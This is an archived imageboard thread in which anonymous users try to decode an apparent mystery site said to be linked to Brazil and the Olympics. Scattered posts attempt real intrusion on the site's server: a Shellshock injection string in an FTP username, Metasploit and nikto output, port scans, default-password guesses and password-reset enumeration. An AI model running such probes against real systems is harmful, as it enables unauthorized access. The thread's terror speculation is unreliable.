Navigation: /b/ - Random [Archive] | Search | [Home]
RandomArchive logo

a1035.com Thread. Things discovered so far in priority orde

The stories and information posted here are artistic works of fiction and falsehood.
Only a fool would take anything posted here as fact.

Thread replies: 308
Thread images: 27
a1035.com Thread.

Things discovered so far in priority order:
1. Website is exploitable through Shellshock

2. Several hidden and cryptic messages in the site. The most intriguing ones are P7STMSLVNVFP8UXKEXFP8QJKZHQRRK.mp4 translated from morse code found within the site, and 22.995186, -82.752599 lead to Mariel in Northeast Cuba.

3. When a1035.com is searched on YouTube, this video appears: https://www.youtube.com/watch?v=vxN5G_28SEo

If I'm missing anything please state it in the thread.

Information about exploit:
This module exploits the code injection flaw known as Shellshock, which leverages specially crafted environment variables in Bash.
>>
>>695848778
The location was a port and there could be something stored there
>>
http://randomarchive.com/board/b/thread/65715 last threaddd
>>
bump
>>
There was something hinting to highgate cemetary, the cemetary in which karl marx was buried
>>
>>695848778
Saw the previous thread.. What is the fuss about with a1035.com ?
>>
has anyone actually ran the exploit yet?
>>
>>695848778
something about

an onion link
graveyard
spectrum pic
static noise
>>
>>695849282
this is the pic
>>
>>695849282
>>695849329
also, pretty sure he got the pic from the static noise
>>
>>695848778
>Website is exploitable through Shellshock
No it's not
>>
>>695849215
Right. I forgot to mention that. Highgate maqbara were the words. Highrate is the Cemetery where Karl Marx is buried and maqbara translates to grave from Arabic.
>>
>>695849280
This.
>>
oh boy all these guys solving a scooby doo mystery yet im here jerking off in my basement
>>
ftp://a1035.com
>>
>>695849280
Not sure yet.. last thread died soo we will have to wait an see
>>
PureFTPD is not exploitable through shellshock

>msf exploit(pureftpd_bash_env_exec) > check
>[*] 192.99.200.154:21 - The target is not exploitable.
>>
File: Spectro.png (194 KB, 1172x406) Image search: [Google]
Spectro.png
194 KB, 1172x406
This is the pic an anon obtained through spectroanalysis.
>>
>>695849624
spectro analisys of what video?
>>
>>695849590
oh yeah and this someone should try and see what the user and pass is
>>
>>>/x/17942052
>>
>>695849608
Try:
$ cat > /tmp/handler.sh
#! /bin/bash
echo auth_ok:1
echo uid:42
echo gid:21
echo dir:/tmp
echo end
^D

$ chmod +x /tmp/handler.sh

# pure-authd -B -s /tmp/ftpd.sock -r /tmp/handler.sh

# pure-ftpd -B -l extauth:/tmp/ftpd.sock

$ ftp 127.0.0.1
Name: () { :; }; touch /tmp/pwnd
Password: whatever
^C

$ ls -l /tmp/pwnd
-rw------- 1 root wheel 0 Jul 22 06:30 /tmp/pwnd
>>
>>695849725
It was of an audio file found on the site. It was just static at high volume, a hobbyist producer took a look at it
>>
>>695849803
I am in!
>>
File: Screenshot_2016-07-22-07-32-47.png (311 KB, 1920x1080) Image search: [Google]
Screenshot_2016-07-22-07-32-47.png
311 KB, 1920x1080
>>695848778
>>
o boi
>>
>>695849928
how
tell us what to type in
>>
>>695850003
holy shit boys the hypeeeeeee
>>
>>695849964
He corrected the username down below so it might not work
>>
>>695849565
Lost
>>
>>695850049
screenshot what you are seeing
>>
Anybody tried the open ssh port?
>>
>>695850119
im not in lol i was hyped cuz the other guy got in XD
>>
>>695850205
fucking kill yourself
>>695850119
retard
>>
>>695849879
Well, he actually never returned.
I got it from the Vocaroo site in WAV and transformed it to the Spectrograph image.
It seem to be missing a channel, so if anybody has the original file, I would be glad to look at it.
Or was the info a1053 site a Vocaroo link?
>>
>>695850072
It did not work. The authentication information is incorrect.
>>
>>695850294
I believe the signal is mono
>>
>>695850344
That's why I'm asking....
>>
>>695850294
My bad <3
>>
ssh [email protected]
password is toor
>>
>>695849727
Someone said this on /x/
Someone try this for the FTP:
Username: elcoe
Password: pass3
>>
>>695849803
It's not working....
I think the version of pureftpd is not vulnerable
>>
>>695848778 → On this thread somebody is going to the port in cuba where the coords led
>>
>>695850072
>>695850300
>I CAN'T FUCKING ACCESS IT THOUGH
you guys were also too busy fucking around to notice
>>
>>695850556
>Name (192.99.200.154:john): elcoe
>331 User elcoe OK. Password required
>Password:
>530 Login authentication failed
>ftp: Login failed.
>Remote system type is UNIX.
>Using binary mode to transfer files.
>>
>>695850600
im fucking retarded
>>
>>695850569
Nothing :/
>>
>>695850628
hello john
>>
Registrant Phone: +99.787474
Admin Phone: +55.12997514602
>>
>>695850556
link the thread
>>
>>695850692
/x/thread/17942052/a1035com
>>
>>695850662
>That's fake...
I knew some faggots would have fallen in the trick.
>>
File: a1035.png (713 KB, 2460x2415) Image search: [Google]
a1035.png
713 KB, 2460x2415
Somebody zoom in on the nose of the image, it's not just a plain color, there's rows of dots that could be some kind of code
>>
>>695850776
this
>>
>>695850631
LOL.jpg
>>
>>695849624
ayyyyyyyylmao
>>
>>695850744
>>>/x/17942052
>>
>>695850776
holy shit good eye fam
>>
the color pattern matches Belgium flag circa Brabant Revolution (1789–1790)
>>
File: 1469187932960.jpg (27 KB, 289x280) Image search: [Google]
1469187932960.jpg
27 KB, 289x280
>>695850776
not great but i try
>>
>>695850776
Looks like normal compression static to mee, where exactly are you looking?
(x/y coords)
>>
21/tcp open ftp
22/tcp open ssh
26/tcp open rsftp
80/tcp open http
82/tcp open xfer
110/tcp open pop3
143/tcp open imap
443/tcp open https
465/tcp open smtps
587/tcp open submission
993/tcp open imaps
995/tcp open pop3s
>>
>>695850776
it may be only dithering
>>
>>695850556
for this link ftp://a1035.com/ that username and password doesn't work
>>
File: ooXQs46.png (180 KB, 1920x1080) Image search: [Google]
ooXQs46.png
180 KB, 1920x1080
>>695851028
>>
>>695851023
Not sure, I just noticed something off about the image. I'm not some kind of cryptographer like some of the anons on here, just calling the shots I see
>>
>>695851116
retard here. what does that mean ?
>>
>>695851176
Fuck off
>>
>>695851176
Open ports. Could be exploited to gain site access potentially.
>>
>>695851116
ciao other italianfag
>>
>>695851127
There was already found data in the image.
The coords were there,
But it's a strange jpg structure... I am working on a lead, but it's manipulated in some way.
>>
>>695850569
Did not work for me either. I guess it was worth a shot at least.
>>
more news from /x/ ... someone said
If you search the .MP4's name

(tg7stmslvnvfp8uxkexfp8qjkzhqrrk) It comes up with a WW2 Doc
>>
>>695851116
Try running nikto on the website.
>>
File: a1035breard.jpg (3 KB, 100x100) Image search: [Google]
a1035breard.jpg
3 KB, 100x100
image search this..
>>
DISCORD

https://discord.gg/n85Sq
https://discord.gg/n85Sq
https://discord.gg/n85Sq
>>
Going to the Unknown ports ( 2077 ) redirects you to 2078 and its login protected anyone have a clue what these ports could be? Or am i just retarded bc its 8am
>>
>>695851397
fuck off the account was made just to post that vid so obviously the pic wont give anything away
>>
>>695851532
True. I wonder if something sketchy really is going on. I should've gone to bed hours ago but I'm too intrigued.
>>
>>695851498
It's probably the cPanel for the site administration.
Probably hard to exploit and almost certanly out of our scope
>>
Hey guys, I made it to the port. There are a lot of PNR officers here. I'll try to look around
>>
https://youtu.be/Mt0I2sAgE5s
>>
>>695851397
https://www.instagram.com/zelim_1995_/
>>
>>695851380
What's nikto?
>>
yall know that recently they found terrorist in brazil or some shit right ? also police had messages that said ''in the olimpic games no one will be safe''
srry for bad english i just woke up
>>
we got fags in /b/ working on this and fags in /x/ working on this, is there any way we could consolidate all the info? maybe an irc?
>>
>>695851397
https://www.youtube.com/watch?v=QmnkfBLndgw LOOK AT THE PROFILE PICTURE
>>
>01111001 01101111 01110101 00100111 01110010 01100101 00100000 01100001 00100000 01100110 01100001 01100111 01100111 01101111 01110100
What did he mean by this?
>>
>>695851705
ES EN SERIO?
>>
>>695851763
Discord

https://discord.gg/n85Sq

https://discord.gg/n85Sq

https://discord.gg/n85Sq
>>
>>695851397
It leads to some vk russian profiles.
Image seems to be irrelevant, it may was a russian meme who was uploaded in vk. A phrase tends to appear above it though
>>
>>695851705
Post a screenshot please.
>>
on mobile it offers to translate from portugese yet i cant see any text also i just got here...
>>
the page has been created by a german person or at least with a german cms.
/config.php links to "config.php-Dateien/socialwidgets.css"
Dateien ist a german term afaik used in no other language
>>
OKAY WTF! using root an toor on port 2077 gives you access
>>
>>695851896
is habbening?
>>
>>695851754
obviously you just woke up, we've discussed this in a previous thread aswell as found countless thing in that previous thread that ran for a couple hours before 404ing
>>
>>695851776
ISIS VID
>>
>>695851885
Sucks, we've found so much in the previous thread. I think you should check it all out before continuing.. Its pretty scary shit http://randomarchive.com/board/b/thread/65715
>>
>>695851896
screenshot pls
>>
+ Target IP: 192.99.200.154
+ Target Hostname: a1035.com
+ Target Port: 80
+ Start Time: 2016-07-22 06:59:52 (GMT-5)
---------------------------------------------------------------------------
+ Server: E-Consulters Web
+ Retrieved via header: 1.1 varnish
+ Retrieved x-powered-by header: PHP/5.6.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-web' found, with contents: Booster
+ Uncommon header 'x-cache' found, with contents: HIT
+ Uncommon header 'x-cacheable' found, with contents: YES
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-cacheable-status' found, with contents: 403
+ Server banner has changed from 'E-Consulters Web' to 'Apache' which may suggest a WAF, load balancer or proxy is in place
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /webmail/blank.html: IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
+ /securecontrolpanel/: Web Server Control Panel
+ /webmail/: Web based mail package installed.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-2117: /cpanel/: Web-based control panel
+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
+ OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
+ OSVDB-3093: /webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
>>
If anyone wants to help me score nudes with my cousin, I'll post any pics she sends me here
javascript:quote('695851853');
>>
>>695852400
shit idk how to link to other threads
>>
>>695851896
no it's not
>>
>>695852400
lol what
>>
Just curiosity, but the Bible on Acts 10:35 says "but accepts from every nation the one who fears him and does what is right"
>>
yall niggas wanna move to >>>17942052
probably won't 404 as fast and won't attract near as many twots >>695852400 or fuckers trying to derail
>>
>>695851868
A screenshot of real life? Haha. I'll try to take a few picture if I find anything interesting. The PNR are everywhere so I'll try not to get caught
>>
>>695851176
it means http://a1035.com:2082/
>>
>>695852347
can you access the config? some1 said it is german, maybe i can help
>>
>>695852599
Lol it's already 404. Just use the discord https://discord.gg/n85Sq
>>
>>695852603
Right haha. I thought you made it to a digital port. Definitely post pictures.
>>
guys I found this in one of the image's EXIF data
011100100110010101110000011011000111100100100000011101000110111100100000011101000110100001101001011100110010000001110100011010000111001001100101011000010110010000100000011011110111001000100000011110010110111101110101011100100010000001101101011011110111010001101000011001010111001000100000011101110110100101101100011011000010000001100100011010010110010100100000011010010110111000100000011010000110010101110010001000000111001101101100011001010110010101110000
>>
>>695852616
>>
>>695852768
FUCK YOU
>>
Holy shit guys I think I figured it out
ISIS is going to
>>
>>695852616
I went here and entered "elcoe" as username in the reset password area and now its asking for a contact emai address. If someone can get into there...
>>
Have you seen this on page source?
<meta property="og:description" content="A América do Sul não tolerará o que aconteceu no Brasil.">

It's in portuguese ... google translate it.
>>
>>695852768
Was already dug up in the previous thread.
Base64
>>
>>695852942
>>695852845
shit that guy beat me and he even has a screenshot
>>
>>695852953
Sorry to say but I think just about everyone here has already seen that
>>
>>695852953
>south america won't tolerate what happened with the Brazil
you're 3 threads late on that
>>
>>695852953
>A América do Sul não tolerará o que aconteceu no Brasil.
>South America will not tolerate what happened in Brazil.
>>
>>695852953
It means "South America will not tolerate what happened in Brazil"
We had an impeachment, and some guys think that it's a coup
>>
>>695852953
>http://randomarchive.com/board/b/thread/65715 last threaddd

dude we know
>>
>>695853053
what are they referring to that happened in brazil
>>
>>695853093
>>695853147
fuck im so slow
>>
>>695852768
That's already been solved:
This is what it is:
'160 154 156/MjIuOTk1MTg2LCAtODIuNzUyNTk56446d860dbbfe540e9e2cbab5f98f1e3'

The last part of the string has to be decoded in base64 and took to this

22.995186, -82.752599��:wδu��{�4{׶q����|W�
>>
>>695852953
>"South America won't tolerate what happened to Brazil"
With the video OP dug out, it makes sense
>>
>>695853190
maybe the second part is encoded in unicode
>>
>>695853190
obviously the second portion isn't accurately deciphered. Maybe it needs to be decoded some other way/format
>>
>>695853190
last part of the string isn't in base64. it's a hash.
>>
>>695853190
>>695852956
it's not the same code
>>
>>695853383
congrats
anon figured out how to install ubuntu
>>
File: kek.png (146 KB, 1897x923) Image search: [Google]
kek.png
146 KB, 1897x923
>>695852768
>>695853190
>>
>>695853488
kek
>>
I just woke up, whats all this about?

can somebody give anons late to the party a recap?
>>
>>695853572
>http://randomarchive.com/board/b/thread/65715 last threaddd
>>
File: brazisisl.jpg (172 KB, 800x500) Image search: [Google]
brazisisl.jpg
172 KB, 800x500
Guys Im in, what is the password
>>
>>695853572
https://discord.gg/n85Sq
>>
http://a1035.com/highgatemaqbara.css
http://a1035.com/4
http://a1035.com/config.php
http://a1035.com/js
>>
>>695853642
what the fuck is that
>>
>>695853383
what is that supposed to mean?
>>
>>695853488
dubs speaks truth
>>
>>695853190
the second part
http://md5cracker.org/decrypted-md5-hash/6446d860dbbfe540e9e2cbab5f98f1e3
>tl dr ".png"
>>
>>695853488
nihher
>>
>>695848778
Yo dinguses

Any site that is still vulnerable to shellshock/ghost/heartbleed isn't worth cracking

If this site is serious about security (which, with so many open ports, they clearly aren't), you won't be able to get in.
>>
>>695853642
How did you get in?
>>
>>695853729
he is hacking the matrix
>>
>>695853488
Kek
>>
>>695853998
kek.jpg
>>
>>695853642

https://www.youtube.com/watch?v=nBB2bPwKWVg
>>
File: a1035 Enhanced.jpg (986 KB, 2460x2415) Image search: [Google]
a1035 Enhanced.jpg
986 KB, 2460x2415
I tried enhancing the picture in photoshop and I'm not seeing any patterns.
>>
>>695854213
pls refer to me in png only, i don't want your compression artifacts
>>
File: received_155646264839680.jpg (9 KB, 762x480) Image search: [Google]
received_155646264839680.jpg
9 KB, 762x480
A friend of mine tried going into the site and this came up.
>>
>>695854287
Same here, but Alpha channel gives a great picture.
But probably not of any significance
>>
>>695854287
try checking the nose in the middle, up close it sorta seems like a vertically stretched code or something
>>
>>695853289
>>695853299
>>695853309

I got it,
'160 154 156/MjIuOTk1MTg2LCAtODIuNzUyNTk56446d860dbbfe540e9e2cbab5f98f1e3' is divided in 3 parts:

'160 154 156' that I don't know what does it mean
'MjIuOTk1MTg2LCAtODIuNzUyNTk5' that are the coords in base64
'6446d860dbbfe540e9e2cbab5f98f1e3' that is the md5 of '.png'
>>
>>695853488
damn youu!
>>
>>695854493
This was found ages ago
>>
Someone on discord claims that hes the one that made all this and that it is fake
idk
>>
>>695854418
i need the full link, maybe another hint. ask him to send the link
>>
>>695854637
dude dont even come in here with that shit. you know its bait why are you spreading it
>>
>>695854637
Who said that?
>>
>>695854571
that was just a recap
>>
>>695854418
give us the link and the process he went through to get that message
>>
>>695853488
Fug
>>
>>695853488
.
>>
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
26/tcp open rsftp
80/tcp open http
82/tcp open xfer
110/tcp open pop3
143/tcp open imap
443/tcp open https
465/tcp open smtps
587/tcp open submission
993/tcp open imaps
995/tcp open pop3s
>>
File: 1469187932960.png (276 KB, 404x361) Image search: [Google]
1469187932960.png
276 KB, 404x361
>>695854458
Here it is
>>
>>695854852
those aren't changed...
It also lack some of them
>>
>>695854913
Seems like dithering
>>
News article I found.
http://www.cnn.com/2016/07/21/americas/brazil-olympics-terror-arrests/
>jihadi messaging channel
Find this channel
>>
http://a1035.com/rev4.wav

We do have the morse code decoded yes?
>>
>>695854987
Thought the same.
What program are you using, it seems crappy.
>>
>>695854913
ty man
>>
File: Lordvoldemort.jpg (60 KB, 469x359) Image search: [Google]
Lordvoldemort.jpg
60 KB, 469x359
>>695854913
solved
>>
>>695855002
"P7STMSLVNVFP8UXKEXFP8QJKZHQRRK.mp4"
>>
>>695855129
Just making sure it wasnt a mistake. <3
>>
>>695854913
doesn't really look like anything up close but i'm just a pleb
>>
>>695853488
kek
>>
Ok so i just searched the website with kali and found a link wich has a fucking morse code
CHECK EM --> a1035.com/rev4.wav
>>
>>695855129
try braille
>>
>>695855127
AYYYYYYY LMAO
>>
>>695854418
>cgi
dude I've been searching for that from the start
give us the link
>>
File: received_155647964839510.jpg (8 KB, 663x442) Image search: [Google]
received_155647964839510.jpg
8 KB, 663x442
>>695854418
He says his conection with the site isn't private, then the message came up.
>>
>>695855192
[code]
P7STMSLVNVFP8UXKEXFP8QJKZHQRRK.mp4
[/code]
>>
File: 1469162346296.jpg (27 KB, 320x581) Image search: [Google]
1469162346296.jpg
27 KB, 320x581
the dude says:

"I also found this picture,

it means, in portuguese: south america won't tolerate what happened with the Brazil

the QR code leds to the website: http://a1035.com/"
>>
>>695855309
Why are code tags /g/ only?
>>
>>695854418
>>695855291
https://a1035.com/cgi-sys/defaultwebpage.cgi is the url
tell your friend to go to http://a1035.com and not https
>>
>>695853488
really
>>
What does the Morse code means? Any1 translated it already?
>>
>>695855291
i went to the url and got the exact same thing
nothing special from my perspective
>>
>>695855543
Like 7 thousand times.
It reads "P7STMSLVNVFP8UXKEXFP8QJKZHQRRK"
It's not MD5, SHA256 or BASE64.
>>
>>695855666
And the site uses .png and .mp4 randomly. So it might mean anything.
>>
>>695855543
>>695855666

i have managed to decrypt it. it says:

-.-- --- ..- .- .-. . .- .-.. .-.. ..-. .- --. --. --- - ...
>>
>>695855842
>-.-- --- ..- .- .-. . .- .-.. .-.. ..-. .- --. --. --- - ...
Idiot (YOUAREALLFAGGOTS)
>>
>>695855842
Top Notch Stuff fagg
>>
>>695849419
Yes it is.
>>
>>695855842
cunt
>>
>>695855945
so exploit it and give us access, i can't be bothered
>>
I cant take this.. Im going to sleep. See you cunts later <3
>>
>>695855945
it's not
the only cgi script I could find was https://a1035.com/cgi-sys/defaultwebpage.cgi
and that isn't vulnerable
>>
>>695855945
no it's not
>>
>>695854418
>browsing incognito
Wow anon you must be a really good hacker wooow
>>
File: Screenshot_4.jpg (172 KB, 822x804) Image search: [Google]
Screenshot_4.jpg
172 KB, 822x804
ayy looks like the surface of the moon
>>
>>695856218
I'll let him know.
>>
Fucking idiot. If you're going to save the world, do it right!
This is the real decrytion.
.. ..-. / -.-- --- ..- / -.. --- -. .----. - / .-. . .--. .-.. -.-- / - --- / - .... .. ... / .--. --- ... - --..-- / -.-- --- ..- .-. / -- --- - .... . .-. .----. ... / --. --- -. -. .- / -.. .. . / .. -. / .... . .-. / ... .-.. . . .--. / - --- -. .. --. .... - .-.-.-
>>
>>695856218
Some people just prefer to not have history when they're doing certain things?
>>
That image in the sound spectrograph bothers me.
It's easy to make but have no purpose other than the scare effect.
I call bullshit on this, it makes no sense to do an image like that with no real leads.
>>
>>695849964
Usernames is Admin.

Already cracked this in previous thread
>>
So...is that where Mew is??
>>
what if someones emails [email protected] with the P7STMSLVNVFP8UXKEXFP8QJKZHQRRK and gets a reply ??
>>
>>695856453
try it man
>>
>>695856390
Do you fags even try what you say?
>>
Can some of you black hat 1337 mofos find out the ip from from this site?
>>
>>695856691
If you can't figure that out there is no point for you to know the IP
>192.99.200.154
>>
>>695856691
they already did goldaguti
>>
>>695856691
it's protected behind 7 proxies and a durex on the internet plug
>>
>>695856691
192.99.200.154
>>
File: Screenshot_5.jpg (8 KB, 610x42) Image search: [Google]
Screenshot_5.jpg
8 KB, 610x42
yolo
>>
Oh, and instead of telling me which one it is, you stupid cunt waste my time by making me ask again? BlooperNas I say!!!
>>
File: trytohelp.png (64 KB, 993x477) Image search: [Google]
trytohelp.png
64 KB, 993x477
Email.. Jew 9§11
>>
https://www.youtube.com/watch?v=bPcDH9VfVww

6 hours ago
>>
>>695856882
Oh, my friend... Yolo, and not much longer. They've got your data now. You're dead. I'll miss you, anon.
>>
>>695856882
excuse me?
>>
Wait where is port guy any update from him
>>
I just showed up, can anyone give me a rundown on what this is?
>>
>>695857066
Terrorist attack at the Olimpic Games
>>
>>695857066
that site's countdown (a1035.com) is the time you have left to answer to this comment before your mother dies in her sleep tonight.
>>
>>695857226
dubs
>>
>>695857066
We found this website (a1035.com) and we think it has something to do with communism, the olympics, brazil and shit, join the discord to find out more and if you find any good leads let us know

https://discordapp.com/channels/206016040486961153/206016040486961153
>>
guys, this is becoming pretty boring
>>
>>695857344
nice dubs
>>
>>695853488
seriously
>>
>>695857226
Oh cool
>>
>>695857226
Ok
>>
Entered "C on DU it" into cPanel's reset password. Got this address: "d—d@y—a.com"

What to make of it?
>>
>>695857783
>>695857654
Your mothers will live!
>>
>>695857790
I don't get what you did. Care to speak newfagish?
>>
>>695857974
>>695857790

went to http://a1035.com/cpanel and reset password using that username, it gave me that security verification email address.
>>
I'm sure you looked at it already.
But what arethe strings in the css
صفر خمسة ثلاثØ

©

... the numbers in the date-script?

5 41 0 11 41 2 7 73 3 59 31 41 29 0 31 53 0 29 41 109 11 162 145 166 064 167 141 166


the hex-name of the image?

d30b7599498d0e8cf28f2cd9a7c9b9ba.png.png
>>
>>695858128
Their firewall blocks me. Now that you're in, send an email to that address demanding the password. If they don't send it, their mothers are going to die in their sleep tonight. Always works, trust me.
>>
>>695858293
>https://discordapp.com/channels/206016040486961153/206016319714230272

The css is unocode string in arab and translated with google it says something like 5 0 3
>>
>>695856882
God speed anon
>>
>>695857790
hack into the email for us?
>>
ok but srsly where is port guy
>>
>>695855330
What dude? Ay guys, was this known beforehand or why is no one giving any attention to this?
>>
>>695858679
come to the discord chat
>>
>>695858679
a dude on an other thread on /x/ dude
>>
>>695858679
https://discord.gg/tqQdj
>>
>>695857790
[email protected] try searching the database for begining d and ending d
>>
>>695858583
He ded
>>
>>695858406
Yeah fuck, discord doesn't take my mail-add.
Fuck them. I won't sign in with my regular mail addresses.

Any suggestions for an semi-safe freemail-provider?
Haven't done this for quite some time.And cyber-rights.net / hushmail / mail.ru are fucked up.
Sorry for these faggy Q&A, I've been off for too long.
>>
>>695859082
guerilla mail
>>
>>695859082
Go anon you retard.
>>
>>695859130
Fuck. Discord also doesn't take guerillamail.org
>>
File: tryhard2.png (134 KB, 1878x839) Image search: [Google]
tryhard2.png
134 KB, 1878x839
https://server13.e-consulters.com.br:2083/resetpass
>>
Guys, if you see this pls invite me back :(
>>
>>695859326
you'd better exclude server13.e-consulters.com.br from the target scope
>>
>>695859584
I invite you back.
>>
>>695859777
why? if that's exactly where the page is?
>>
WARNING:

Don't try to access the server or attempt to brute force or hack it. You will be automatically banned and won't be able to access the website any longer.
>>
>>695859269
IWont. ImIn.
>>
>>695860161
>Don't try to access the server
then what are we supposed to do
look at the url?
>>
>>695860429
You can access the website. Just don't attempt to access the fucking server.
>>
>>695860935
u mad?
>>
>>695861225
U mad?
>>
File: bruteforcingtheirfirewalls.webm (913 KB, 720x404) Image search: [Google]
bruteforcingtheirfirewalls.webm
913 KB, 720x404
>>
File: image(15).jpg (69 KB, 500x700) Image search: [Google]
image(15).jpg
69 KB, 500x700
Did you try pluggin it in and out yet?
>>
>>695860161
Banned? Whay does that look like?
>>
>>695861595
It looks like you won't be able to access the website anymore. It just says it can't connect.

I've tried using a proxy and I can connect to it, but I think my IP is blocked.
>>
>>695853488
m m ,,m
>>
File: Screenshot_2016-07-22-00-27-29.png (101 KB, 480x800) Image search: [Google]
Screenshot_2016-07-22-00-27-29.png
101 KB, 480x800
Does anyone recognize these numbers in any way?
>>
>>695862719
what user/pass?
>>
Did we find any further information on this thread?

Archive it or let it 404?
>>
>>695862964
archive at least
>>
>>695862964
Archive it. It's all useful
>>
>>695863017
yes
>>
File: a10351.jpg (119 KB, 720x1280) Image search: [Google]
a10351.jpg
119 KB, 720x1280
brazfag reporting in
we have these 2 imagens going on in the wapp groups..
>>
File: a10352.jpg (58 KB, 540x960) Image search: [Google]
a10352.jpg
58 KB, 540x960
>>695863260
and this one
also the message in the frist one is:

>"walking by downtown of my city I bumped >into this poster with a QRcode, I scanned it >and this site apeared <link> with a contdown.
>I've seen many groups talking about this.
>has it appeared in your city? What would it >be?
>(do'nt ignore me-slang shit)

poster

>South America
WON'T TOLERATE
What happened to Brasil
>>
This is bait, they wouldn't do that shit if it was something serious.
>>
>>695862964
I just posted 2 images
>>
>>695863648
huh thenewworldend cool
>>
>>695851498
2077 was when the nukes dropped in fallout
>>
looks like the faca plays youtube page pulled the video...

https://www.youtube.com/channel/UCEYZXqaKQmOgCGiYhJp74vg
>>
>>695865008
Interesting.
Other people have reuploaded it though.
>>
File: 1469116437259.jpg (77 KB, 600x900) Image search: [Google]
1469116437259.jpg
77 KB, 600x900
can someone explain wtf is going on.
>>
Archived post pls
>>
We found something interesting in the discord.
This video was retitled into a1035.com today. It was first posted November 29.

That's not the creepy part.
His channel name.
a1035 05/08
August 8 is the start of the Olympics.

In total, he has 3 posts.
https://www.youtube.com/channel/UC1Tcp8Lp7wPyylJazirMOmw

The most recent one is a meme that ONLY surfaced 2 weeks ago. He had posted it on November 29.

We have to ask a question now.
Are these people controlling and manipulating our memes?
Does this conspiracy go farther than just the Olympics?

We must find out.
>>
throwing the shit on the fan.

If it's a joke, let the police figure it out.
>>
https://www.youtube.com/watch?v=QBZ_jA5BKX4
>>
>>695856435
kek
>>
>>695866052
I'm going to try to reverse it
>>
https://www.youtube.com/watch?v=sPlHU4bDso0
Fuck I hate Isis.
>>
>>695865934
dammit, the first video on their channel page is fucked.
>>
Bumping
>>
>>695866052
>>695866580
Why are we just finding these now?
>>
elcoe is username or password
El coe is an acronym for the comittee
Of the spanish olympics
>>
They registerd a date as the postal code 05072016. Anybody got an idea? To lazy to screen it but just enter the page on who.is
>>
>>695865934
Which meme?


Also, sorry about the archive. The site I used to use is down.
>>
>>695867306
Is that July 5 or May 7?
>>
>>695867306
>>695867634

so here's what happened on july 5th:
http://www.democracynow.org/2016/7/5/headlines

and here's may 7:
http://theweek.com/10things/618926/10-things-need-know-today-may-7-2016
>>
>>695867634

Brazil does D/M/Y
>>
>>695867634
Br uses dmy so July 5th
>>
>>695867768
A bunch of terrorist attacks and deaths on July 5
>>
>>695868162
exactly. i'm not sure what that means, but shit definitely went down that day.
>>
I got registerd 12 days after july 5. So something must have happend around that time
Thread replies: 308
Thread images: 27


Navigation: /b/ - Random [Archive] | Search | [Home]
Navigation: /b/ - Random [Archive] | Search | [Home]


If you need a post removed click on it's [Report] button and follow the instruction.
DMCA Content Takedown via dmca.com
If you like this website please support us by donating with Bitcoins at 16mKtbZiwW52BLkibtCr8jUg2KVUMTxVQ5
All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
This is a 4chan archive - all of the content originated from that site. This means that RandomArchive shows their content, archived. If you need information for a Poster - contact them.